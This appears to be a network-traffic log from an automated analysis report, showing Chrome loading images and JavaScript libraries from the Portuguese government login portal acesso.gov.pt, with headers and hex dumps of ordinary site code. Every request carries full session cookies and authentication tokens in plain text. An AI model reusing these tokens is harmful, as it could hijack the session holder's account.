                                                                                                                  2024-11-14 13:59:56 UTC8698INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 d4 00 00 00 41 08 06 00 00 00 a9 75 8a e8 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0d d7 00 00 0d d7 01 42 28 9b 78 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ed 9d 77 7c 54 65 d6 c7 bf e7 ce 4c 0a a1 85 0e 99 09 4d e9 2a 0a 58 50 c1 48 26 a1 28 ba 8a e8 5a b0 8b 15 7b 43 77 d5 5d 5c eb aa 88 ba bb 76 d4 45 c1 b2 b6 05 52 10 04 22 52 2c 08 22 bd 64 26 48 51 42 4f 9b b9 e7 fd e3 de 99 64 92 49 28 01 cb bb f7 f7 f9 4c 72 ef 7d ce d3 ee bd e7 3e e7 39 cf 39 e7 11 55 c5 81 03 07 87 06 c6 af dd 00 07 0e fe 3f c1 61 28 07 0e 0e 21 1c 86 72 e0 e0 10 c2 7d a0 19 fa 0c bd 6e
                                                                                                                  Data Ascii: PNGIHDRAusBIT|dpHYsB(xtEXtSoftwarewww.inkscape.org< IDATxw|TeLM*XPH&(Z{Cw]\vER"R,"d&HQBOdI(Lr}>99U?a(!r}n


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  27192.168.2.44976562.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:56 UTC920OUTGET /autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 8308
                                                                                                                  2024-11-14 13:59:56 UTC8308INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 76 61 72 20 74 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 3b 72 65 74 75 72 6e 20 65 2e 70 72 6f 70 3f 65 2e 70 72 6f 70 2e 61 70 70 6c 79 28 65 2c 74 29 3a 65 2e 61 74 74 72 2e 61 70 70 6c 79 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 2c 6e 29 7b 76 61 72 20 73 2c 61 3b 66 6f 72 28 73 20 69 6e 20 6e 29 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 73 29 26 26 28 61 3d 73 2e 72 65 70 6c 61 63 65 28 2f 20 7c 24 2f 67 2c 74 2e 65 76 65 6e 74 4e 61 6d 65 73 70 61 63 65 29 2c 65 2e 62 69 6e 64 28 61 2c 6e 5b 73 5d 29 29 7d 66 75 6e 63 74
                                                                                                                  Data Ascii: (function(e,t){"use strict";function n(e){var t=Array.prototype.slice.call(arguments,1);return e.prop?e.prop.apply(e,t):e.attr.apply(e,t)}function s(e,t,n){var s,a;for(s in n)n.hasOwnProperty(s)&&(a=s.replace(/ |$/g,t.eventNamespace),e.bind(a,n[s]))}funct


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  28192.168.2.44976762.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:56 UTC1122OUTGET /autentica_static/js/app.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 58651
                                                                                                                  2024-11-14 13:59:56 UTC16014INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 21 77 69 6e 64 6f 77 2e 53 41 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 53 41 20 3d 20 7b 7d 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2f 2f 2a 0d 0a 20 20 20 20 2f 2f 2a 20 47 65 6e 65 72 69 63 20 4d 6f 64 61 6c 20 46 75 6e 63 74 69 6f 6e 20 28 4f 70 65 6e 20 61 6e 64 20 43 6c 6f 73 65 29 0d 0a 20 20 20 20 2f 2f 2a 0d 0a 0d 0a 20 20 20 20 53 41 2e 4d 6f 64 61 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 4f 70 65 6e 3a 20 66 75 6e 63 74 69 6f 6e 20 28 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 2e 66 61 64 65 49 6e 28
                                                                                                                  Data Ascii: (function ($) { if (!window.SA) { SA = {}; } //* //* Generic Modal Function (Open and Close) //* SA.Modal = function () { return { Open: function (id, callback) { id.fadeIn(
                                                                                                                  2024-11-14 13:59:56 UTC16384INData Raw: 61 72 65 6e 74 28 29 2e 70 61 72 65 6e 74 28 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 61 73 2d 65 72 72 6f 72 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 65 46 6f 72 6d 2e 66 69 6e 64 28 27 69 6e 70 75 74 2c 20 73 65 6c 65 63 74 2c 20 63 68 65 63 6b 62 6f 78 2c 20 74 65 78 74 61 72 65 61 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 65 6c 70 2d 62 6c 6f 63 6b 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 61 62 65 6c 2e 72 65 6d 6f 76 65 28 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: arent().parent().removeClass('has-error'); } theForm.find('input, select, checkbox, textarea').removeClass('help-block'); label.remove(); },
                                                                                                                  2024-11-14 13:59:56 UTC370INData Raw: 42 74 6e 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 75 62 6d 69 74 42 74 6e 2e 68 61 73 43 6c 61 73 73 28 27 65 78 74 65 72 6e 61 6c 50 61 72 74 69 63 69 70 61 6e 74 27 29 29 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 41 2e 4d 6f 64 61 6c 2e 4f 70 65 6e 28 24 28 27 23 63 6f 6e 66 69 72 6d 4d 6f 64 61 6c 27 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 75 62 6d 69
                                                                                                                  Data Ascii: Btn.click(function(event){ event.preventDefault(); if(submitBtn.hasClass('externalParticipant')) { SA.Modal.Open($('#confirmModal'),function(){ var submi
                                                                                                                  2024-11-14 13:59:56 UTC16384INData Raw: 29 2e 62 69 6e 64 28 27 63 6c 69 63 6b 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 68 65 63 6b 74 65 72 6d 73 2e 66 69 6e 64 28 27 69 6e 70 75 74 27 29 2e 70 72 6f 70 28 27 63 68 65 63 6b 65 64 27 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 61 62 6c 65 45 6c 65 6d 65 6e 74 73 28 5b 73 75 62 6d 69 74 42 74 6e 2c 20 73 75 62 6d 69 74 42 74 6e 45 78 74 65 72 6e 61 6c 50 61 72 74 69 63 69 70 61 6e 74 5d 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 65 46 6f 72 6d 2e 73 75 62 6d 69 74 28 29 3b 0d 0a 20 20
                                                                                                                  Data Ascii: ).bind('click',function(){ checkterms.find('input').prop('checked', true); disableElements([submitBtn, submitBtnExternalParticipant]); theForm.submit();
                                                                                                                  2024-11-14 13:59:56 UTC9499INData Raw: 20 3d 20 24 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 2e 70 61 72 65 6e 74 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 6d 43 6f 6e 74 61 69 6e 65 72 20 3d 20 24 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 61 73 2d 65 72 72 6f 72 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 6d 43 6f 6e 74 61 69 6e 65 72 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 61 73 2d 65 72
                                                                                                                  Data Ascii: = $(this).parent().parent(); } else { elmContainer = $(this).parent(); $(this).removeClass('has-error'); } elmContainer.removeClass('has-er


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  29192.168.2.44976662.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:56 UTC1148OUTGET /autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 35961
                                                                                                                  2024-11-14 13:59:56 UTC16014INData Raw: 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 34 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 35 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70 74 20 72 65 71 75 69 72 65 73 20 6a 51
                                                                                                                  Data Ascii: /*! * Bootstrap v3.3.4 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQ
                                                                                                                  2024-11-14 13:59:56 UTC16384INData Raw: 65 46 6f 63 75 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 66 66 28 22 66 6f 63 75 73 69 6e 2e 62 73 2e 6d 6f 64 61 6c 22 29 2e 6f 6e 28 22 66 6f 63 75 73 69 6e 2e 62 73 2e 6d 6f 64 61 6c 22 2c 61 2e 70 72 6f 78 79 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 3d 3d 3d 61 2e 74 61 72 67 65 74 7c 7c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 28 61 2e 74 61 72 67 65 74 29 2e 6c 65 6e 67 74 68 7c 7c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 7d 2c 74 68 69 73 29 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 65 73 63 61 70 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 73 53 68 6f 77 6e 26 26 74 68 69 73 2e 6f 70 74 69 6f
                                                                                                                  Data Ascii: eFocus=function(){a(document).off("focusin.bs.modal").on("focusin.bs.modal",a.proxy(function(a){this.$element[0]===a.target||this.$element.has(a.target).length||this.$element.trigger("focus")},this))},c.prototype.escape=function(){this.isShown&&this.optio
                                                                                                                  2024-11-14 13:59:56 UTC370INData Raw: 65 6e 74 65 64 28 29 29 7b 76 61 72 20 68 3d 61 28 64 29 3b 74 68 69 73 2e 61 63 74 69 76 61 74 65 28 62 2e 63 6c 6f 73 65 73 74 28 22 6c 69 22 29 2c 63 29 2c 74 68 69 73 2e 61 63 74 69 76 61 74 65 28 68 2c 68 2e 70 61 72 65 6e 74 28 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 74 72 69 67 67 65 72 28 7b 74 79 70 65 3a 22 68 69 64 64 65 6e 2e 62 73 2e 74 61 62 22 2c 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 62 5b 30 5d 7d 29 2c 62 2e 74 72 69 67 67 65 72 28 7b 74 79 70 65 3a 22 73 68 6f 77 6e 2e 62 73 2e 74 61 62 22 2c 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 65 5b 30 5d 7d 29 7d 29 7d 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 61 63 74 69 76 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 64 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 66 28 29 7b 67 2e 72 65
                                                                                                                  Data Ascii: ented()){var h=a(d);this.activate(b.closest("li"),c),this.activate(h,h.parent(),function(){e.trigger({type:"hidden.bs.tab",relatedTarget:b[0]}),b.trigger({type:"shown.bs.tab",relatedTarget:e[0]})})}}},c.prototype.activate=function(b,d,e){function f(){g.re
                                                                                                                  2024-11-14 13:59:56 UTC3193INData Raw: 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 21 31 29 2c 62 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2e 66 69 6e 64 28 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 74 61 62 22 5d 27 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 21 30 29 2c 68 3f 28 62 5b 30 5d 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 62 2e 61 64 64 43 6c 61 73 73 28 22 69 6e 22 29 29 3a 62 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 61 64 65 22 29 2c 62 2e 70 61 72 65 6e 74 28 22 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 29 2e 6c 65 6e 67 74 68 26 26 62 2e 63 6c 6f 73 65 73 74 28 22 6c 69 2e 64 72 6f 70 64 6f 77 6e 22 29 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2e 65 6e 64 28 29 2e 66 69 6e 64 28 27 5b 64 61 74 61 2d 74 6f 67
                                                                                                                  Data Ascii: ("aria-expanded",!1),b.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",!0),h?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu").length&&b.closest("li.dropdown").addClass("active").end().find('[data-tog


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  30192.168.2.44976862.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:56 UTC1133OUTGET /autentica_static/js/capslock-login.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 1609
                                                                                                                  2024-11-14 13:59:56 UTC1609INData Raw: 76 61 72 20 63 61 70 73 6c 6f 63 6b 41 63 74 69 76 65 20 3d 20 66 61 6c 73 65 3b 0d 0a 76 61 72 20 69 6e 70 75 74 4e 69 66 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 73 73 77 6f 72 64 2d 6e 69 66 22 29 3b 0d 0a 76 61 72 20 69 6e 70 75 74 45 6f 72 69 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 73 73 77 6f 72 64 2d 65 6f 72 69 22 29 3b 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 61 70 73 4c 6f 63 6b 45 76 65 6e 74 44 65 74 65 63 74 28 65 76 65 6e 74 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 63 61 70 73 4e 69 66 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 61 70 73 2d 6e 69 66 22 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 61 70 73 45
                                                                                                                  Data Ascii: var capslockActive = false;var inputNif = document.getElementById("password-nif");var inputEori = document.getElementById("password-eori");function capsLockEventDetect(event) { var capsNif = document.getElementById("caps-nif"); var capsE


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  31192.168.2.44977162.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:56 UTC921OUTGET /autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC401INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=14
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 21587
